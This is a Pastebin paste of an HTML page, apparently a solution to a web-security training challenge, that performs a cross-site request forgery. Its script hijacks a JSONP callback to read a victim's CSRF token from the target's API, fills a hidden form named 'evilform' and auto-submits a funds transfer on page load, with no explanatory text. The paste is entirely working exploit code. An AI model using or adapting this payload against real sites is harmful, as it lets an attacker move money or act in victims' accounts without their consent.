Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body>
- <form id="evilform" action="https://d57764de182658cfafc5947f3c848b83.54-229-160-138.avatao-challenge.com/api/transfer" method="post">
- <input type="text" name="username" value="test2" />
- <input type="text" name="amount" value="1" />
- <input id="tokeninput" type="text" name="token" />
- </form>
- </body>
- <script>
- function jsonPaydudeApi(a){
- console.log(a);
- var csrfToken = a['token'];
- console.log(csrfToken);
- document.getElementById("tokeninput").value = csrfToken;
- document.getElementById("evilform").submit();
- alert("VIHIMA06");
- }
- </script>
- <script src="https://d57764de182658cfafc5947f3c848b83.54-229-160-138.avatao-challenge.com/api/getcsrf?api_key=241543903&format=json&nojsoncallback=0"></script >
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
